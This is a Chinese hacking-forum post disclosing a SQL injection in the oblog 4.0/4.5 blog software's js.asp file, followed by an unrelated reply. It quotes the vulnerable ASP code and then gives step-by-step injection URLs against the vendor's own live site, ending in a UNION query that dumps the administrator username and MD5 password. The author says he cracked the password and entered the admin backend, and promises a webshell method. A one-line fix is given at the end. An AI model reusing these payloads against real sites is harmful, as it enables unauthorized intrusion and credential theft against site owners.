oblog最新漏洞(OBLOG4.0跟最新的OBLOG4.5通杀)
<P>不废话话了OBLOG4.0跟最新的OBLOG4.5通杀。<BR>漏洞文件:js.asp<BR>看代码<BR></P><H6 class=quote><A onclick="CopyCode(document.getElementById('code1'));" href="javascript:"><FONT color=#2f5fa1>Copy code</FONT></A></H6>
<BLOCKQUOTE id=code1><!--#include file="conn.asp"--><BR><!--#include file="inc/class_sys.asp"--><BR><%<BR>Dim oblog<BR>set oblog=new class_sys<BR>oblog.autoupdate=False<BR>oblog.start<BR>dim js_blogurl,n<BR>js_blogurl=Trim(oblog.CacheConfig(3))<BR>n=CInt(Request("n"))<BR>if n=0 then n=1<BR>select case CInt(Request("j"))<BR> case 1<BR> call tongji()<BR> case 2<BR> call topuser()<BR> case 3<BR> call adduser()<BR> case 4<BR> call listclass()<BR> case 5<BR> call showusertype()<BR> case 6<BR> call listbestblog()<BR> case 7<BR> call showlogin()<BR> case 8<BR> call showplace()<BR> case 9<BR> call showphoto()<BR> case 10<BR> call showblogstars()<BR> Case 11<BR> Call show_hotblog()<BR> Case 12<BR> Call show_teams()<BR> Case 13<BR> Call show_posts()<BR> Case 14<BR> Call show_hottag()<BR> case 0<BR> call showlog()<BR>end select<BR>****************省略部分代码******************<BR>Sub show_posts()<BR> Dim teamid,postnum,l,u,t<BR> teamid=Request("tid")<BR> postnum=n<BR> l=CInt(Request("l"))<BR> u=CInt(Request("u"))<BR> t=CInt(Request("t"))<BR> Dim rs,sql,sRet,sAddon<BR> Sql="select Top " & postnum & " teamid,postid,topic,addtime,author,userid From oblog_teampost Where idepth=0 and isdel=0 "<BR> If teamid<>"" And teamid<>"0" Then<BR> teamid=Replace(teamid,"|",",")<BR> Sql=Sql & " And teamid In (" & teamid & ") "<BR> End If<BR> Sql=Sql & " Order by postid Desc"<BR> Set rs=oblog.Execute(Sql)<BR> sRet="<ul>"<BR> Do While Not rs.Eof<BR> sAddon=""<BR> sRet=sRet & "<li><a href="""&js_blogurl&"group.asp?gid=" & rs(0 target=_blank) & "&pid=" & rs(1) & """ target=""_blank"">" & oblog.Filt_html(Left(rs(2),l)) & "</a>"<BR> If u=1 Then sAddon=rs(4)<BR> if t=1 Then<BR> If sAddon<>"" Then sAddon=sAddon & ","<BR> sAddon=sAddon & rs(3)<BR> End If<BR> If sAddon<>"" Then sAddon="(" & sAddon & ")"<BR> sRet=sRet & sAddon & "</li>"<BR> rs.Movenext<BR> Loop<BR> Set rs = Nothing<BR> sRet=sRet & "</ul>"<BR> Response.write oblog.htm2js (sRet,True)<BR>End Sub</BLOCKQUOTE>
<P><BR><BR>很明显就看到TID没有经过过滤就直接递交给TEAMID了 TEAMID只过滤了"|" 就直接进SQL语句了,对我们的注入没多大影响.<BR>下面拿官方来测试.<BR><A href="http://www.oblog.com.cn/index.html" target=_blank><FONT color=#2f5fa1>http://www.oblog.com.cn/index.html</FONT></A><BR><BR>直接进入js.asp页 要调用show_posts()过程必须要符合上面的参数n=1,j=13<BR>懂ASP的就很容易看懂了,开始注咯,要注意的只是(" & teamid & ")两边的括号<BR>很容易就能闭合他协调回SQL语句了,下面就开始测试注入是否存在了<BR>提交<BR></P>
<H6 class=quote><A onclick="CopyCode(document.getElementById('code2'));" href="javascript:"><FONT color=#2f5fa1>Copy code</FONT></A></H6>
<BLOCKQUOTE id=code2>http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1</BLOCKQUOTE>
<P><BR><B>如图1</B><BR><IMG onclick="if(this.width>=800) window.open('http://forum.eviloctal.com/attachment/Mon_0704/58_4_61f551a61df3c56.jpg');" src="http://forum.eviloctal.com/attachment/Mon_0704/58_4_61f551a61df3c56.jpg" onload="if(this.width>'800')this.width='800';if(this.height>'800')this.height='800';" border=0> <BR>这图比较怪.呵呵.接着加个单引号试试.<BR><B>如图2</B><BR><IMG onclick="if(this.width>=800) window.open('http://forum.eviloctal.com/attachment/Mon_0704/58_4_b007becdea8fac1.jpg');" src="http://forum.eviloctal.com/attachment/Mon_0704/58_4_b007becdea8fac1.jpg" width=800 onload="if(this.width>'800')this.width='800';if(this.height>'800')this.height='800';" border=0> <BR>接着提交<BR></P>
<H6 class=quote><A onclick="CopyCode(document.getElementById('code3'));" href="javascript:"><FONT color=#2f5fa1>Copy code</FONT></A></H6>
<BLOCKQUOTE id=code3>http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 1=1 and (1=1</BLOCKQUOTE>
<P><BR>返回正常<BR><B>如图3</B><BR><IMG onclick="if(this.width>=800) window.open('http://forum.eviloctal.com/attachment/Mon_0704/58_4_ce0f0a724bbbf69.jpg');" src="http://forum.eviloctal.com/attachment/Mon_0704/58_4_ce0f0a724bbbf69.jpg" onload="if(this.width>'800')this.width='800';if(this.height>'800')this.height='800';" border=0> <BR></P>
<H6 class=quote><A onclick="CopyCode(document.getElementById('code4'));" href="javascript:"><FONT color=#2f5fa1>Copy code</FONT></A></H6>
<BLOCKQUOTE id=code4>http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 1=1 and (1=2</BLOCKQUOTE>
<P><BR>返回异常<BR><B>如图4</B><BR><IMG onclick="if(this.width>=800) window.open('http://forum.eviloctal.com/attachment/Mon_0704/58_4_62728d7183343c4.jpg');" src="http://forum.eviloctal.com/attachment/Mon_0704/58_4_62728d7183343c4.jpg" onload="if(this.width>'800')this.width='800';if(this.height>'800')this.height='800';" border=0> <BR>仔细看就能看出 异常的时候没有黑点的.真骚<BR>下面就可以猜管理员表了<BR></P>
<H6 class=quote><A onclick="CopyCode(document.getElementById('code5'));" href="javascript:"><FONT color=#2f5fa1>Copy code</FONT></A></H6>
<BLOCKQUOTE id=code5>http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 查询语句 and (1=1</BLOCKQUOTE>
<P><BR>自己慢慢猜就可以了<BR></P>
<H6 class=quote><A onclick="CopyCode(document.getElementById('code6'));" href="javascript:"><FONT color=#2f5fa1>Copy code</FONT></A></H6>
<BLOCKQUOTE id=code6>Sql="select Top " & postnum & " teamid,postid,topic,addtime,author,userid From oblog_teampost Where idepth=0 and isdel=0 "</BLOCKQUOTE>
<P><BR>后面我发现可以直接用UNION暴帐号密码,下面就来试试<BR>先看看他的SQL语句有几个字段, 一共SELECT了6个 那么提交<BR></P>
<H6 class=quote><A onclick="CopyCode(document.getElementById('code7'));" href="javascript:"><FONT color=#2f5fa1>Copy code</FONT></A></H6>
<BLOCKQUOTE id=code7>http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 1=2 union select 1,2,3,4,5,6 from oblog_admin where id=(1</BLOCKQUOTE>
<P><BR>怎么没有像其他UNION查询的回显数字呢? 其实一切就在源文件里<BR>打开源文件就能发现<BR></P>
<H6 class=quote><A onclick="CopyCode(document.getElementById('code8'));" href="javascript:"><FONT color=#2f5fa1>Copy code</FONT></A></H6>
<BLOCKQUOTE id=code8>document.write('<ul><li><a href="http://www.oblog.com.cn/group.asp?gid=1&pid=2" target="_blank"></a></li></ul>' target=_blank);</BLOCKQUOTE>
<P><BR>gid=1跟pid=2里的1,2就是了 直接替换里面的1,2为username,password<BR><B>如图5</B><BR><IMG onclick="if(this.width>=800) window.open('http://forum.eviloctal.com/attachment/Mon_0704/58_4_bdfb21f866ce809.jpg');" src="http://forum.eviloctal.com/attachment/Mon_0704/58_4_bdfb21f866ce809.jpg" width=800 onload="if(this.width>'800')this.width='800';if(this.height>'800')this.height='800';" border=0> <BR>提交<BR></P>
<H6 class=quote><A onclick="CopyCode(document.getElementById('code9'));" href="javascript:"><FONT color=#2f5fa1>Copy code</FONT></A></H6>
<BLOCKQUOTE id=code9>http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 1=2 union select username,password,3,4,5,6 from oblog_admin where id=(1</BLOCKQUOTE>
<P><BR>查看源文件,gid后面的就是管理员帐号 pid后面的就是管理员的MD5密码了<BR><B>如图6</B><BR><IMG onclick="if(this.width>=800) window.open('http://forum.eviloctal.com/attachment/Mon_0704/58_4_50bc8744164f82a.jpg');" src="http://forum.eviloctal.com/attachment/Mon_0704/58_4_50bc8744164f82a.jpg" width=800 onload="if(this.width>'800')this.width='800';if(this.height>'800')this.height='800';" border=0> <BR>官方的密码我已经破了 直接冲进后台<BR>WEBSHELL因为官方权限太死跟本人太菜 所以就拿不到SHELL<BR>拿WEBSHELL的方法很简单 我改天做个录象顺便发上来<BR>OBLOG的漏洞还不止这些的,大家慢慢研究研究吧.<BR><BR>漏洞修补:<BR></P>
<H6 class=quote><A onclick="CopyCode(document.getElementById('code10'));" href="javascript:"><FONT color=#2f5fa1>Copy code</FONT></A></H6>
<BLOCKQUOTE id=code10>......<BR>teamid=int(teamid)<BR>...... </BLOCKQUOTE>
re:oblog最新漏洞(OBLOG4.0跟最新的OBLOG4.5通杀)
<P>我忽然想起很久很久以前看过的一句话,爱到极致就恨到极致。一个弱女子,何必如何在意她呢?</P><P> </P>
页:
[1]